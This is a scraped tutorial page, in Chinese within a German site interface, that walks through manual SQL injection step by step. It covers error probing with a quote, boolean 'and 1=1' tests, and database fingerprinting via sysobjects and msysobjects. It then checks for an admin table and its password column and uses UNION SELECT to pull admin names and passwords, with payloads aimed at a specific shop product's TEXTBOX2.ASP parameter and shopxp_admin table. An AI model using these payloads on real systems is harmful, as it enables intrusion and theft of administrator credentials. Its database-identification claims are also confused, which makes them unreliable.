Gemeinschaft Lernen Tools-Bibliothek Freizeit

Deutsch

Heim > Datenbank > MySQL-Tutorial > 检测有没有注入点：

检测有没有注入点：

WBOY

Freigeben： 2016-06-07 15:10:52

Original

1376 Leute haben es durchsucht

检测有没有注入点：直接加一个'号，返回错误页初步断定有漏洞！然后 and 1=1 返回正常 and 1=2 返回错误调用查询时候有漏洞！然后查什么数据库！代码： and (select count (*) from sysobjects)=0 返回错误说明是Access数据库因为Access没有sysobject

检测有没有注入点：
直接加一个'号，返回错误页初步断定有漏洞！
然后 and 1=1 返回正常 and 1=2 返回错误调用查询时候有漏洞！然后查什么数据库！
代码： and (select count (*) from sysobjects)>=0 返回错误说明是Access数据库因为Access没有sysobjects系统表！

如果返回正常那就打下面的代码：
and (select count (*) from msysobjects)>=0 如果返回错误说明是 mysql数据库因为 sql server没有msysobjects系统表！

之后查询没有没有admin表，代码：
and exists(select * from admin) 返回正常说明有admin表返回错误说明没有！

然后查询admin表有没有admin，password两个字段！代码：
and exists(select admin from admin) 返回正常说明有！错误则没有！
and exists(select password from admin) 返回正常说明有！错误则没有！
最后联合查询
order by 查该页面共有多少字段
union select 1,2,3,4,5,6,........n from admin 查账户名和密码的字段位置

TEXTBOX2.ASP?action=modify&newsi%64=

shopxp_admin
and exists(select * from shopxp_admin)
and exists(select admin from shopxp_admin)

union select 1,2,admin,4,5,6,7 from shopxp_admin

union select 1,2,password,4,5,6,7 from shopxp_admin

and exists(select admin from shopxp_admin)

Verwandte Etiketten：

检测 Injektion 返回

Quelle：php.cn

Vorheriger Artikel：为什么要关闭数据库连接，可以不关闭吗？ Nächster Artikel：汉字拼音数据库

Erklärung dieser Website

Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn

Neueste Artikel des Autors

Was ist eine NullPointerException und wie behebe ich sie?

2024-10-22 09:46:29
Vom Anfänger zum Programmierer: Ihre Reise beginnt mit C-Grundlagen

2024-10-13 13:53:41
Webentwicklung mit PHP freischalten: Ein Leitfaden für Anfänger

2024-10-12 12:15:51
C entmystifizieren: Ein klarer und einfacher Weg für neue Programmierer

2024-10-11 22:47:31
Entfalten Sie Ihr Programmierpotenzial: C-Programmierung für absolute Anfänger

2024-10-11 19:36:51
Entfesseln Sie Ihren inneren Programmierer: C für absolute Anfänger

2024-10-11 15:50:41
Automatisieren Sie Ihr Leben mit C: Skripte und Tools für Anfänger

2024-10-11 15:07:41
PHP leicht gemacht: Ihre ersten Schritte in der Webentwicklung

2024-10-11 14:21:21
Erstellen Sie alles mit Python: Ein Leitfaden für Anfänger, um Ihrer Kreativität freien Lauf zu lassen

2024-10-11 12:59:11
Der Schlüssel zum Programmieren: Die Leistungsfähigkeit von Python für Anfänger freischalten

2024-10-11 12:17:31

Aktuelle Ausgaben

Wo soll ich die CustomLog-Direktive in Apache platzieren? Ich verwende php:7.2-apachedocker. Ich muss das URL-Anmeldezugriffsprotokoll zur Gesundhei...

Aus 2024-04-06 22:03:59

0

1

990

Die Abfrage und die Formel bilden die gesamte Tabelle mit neuen Spalten, wobei die neuen Spalten Formeln sind, die andere bedingte Spaltenwerte beinhalten BEARBEITEN: Die Formel sollte die Spalte „Wert“ sein – die Spalte „Wert“ mit der niedrigst...

Aus 2024-04-06 21:23:40

0

2

530

Sudoku-Checker funktioniert nicht? Kann mir jemand helfen, den Fehler zu identifizieren? Ich habe alles im Online-Editor versucht, erhalte aber immer noch die Fehlermeldung. Aber ...

Aus 2024-04-06 21:21:07

0

1

474

Wählen Sie Woocommerce-bezogene Produkte mithilfe einer benutzerdefinierten Taxonomie mit 3-Ebenen-Hierarchie aus Ich habe einen Woocommerce-Shop mit der benutzerdefinierten Klassifizierung „Sport“. Die K...

Aus 2024-04-06 20:05:30

0

1

544

Datensatzabfrage unter Teilwertbedingungen – gemeinsame Nutzung von SQL-Kenntnissen Ich habe eine Tabelle namens zipcode, die eine Spalte namens code enthält. Die Spalte „Cod...

Aus 2024-04-06 16:01:26

0

1

395

verwandte Themen

Mehr>

Beliebte Empfehlungen

Beliebte Tutorials

Mehr>

Verwandte Tutorials

Beliebte Empfehlungen

Aktuelle Kurse

Neueste Downloads

Mehr>

Web-Effekte

Quellcode der Website

Website-Materialien

Frontend-Vorlage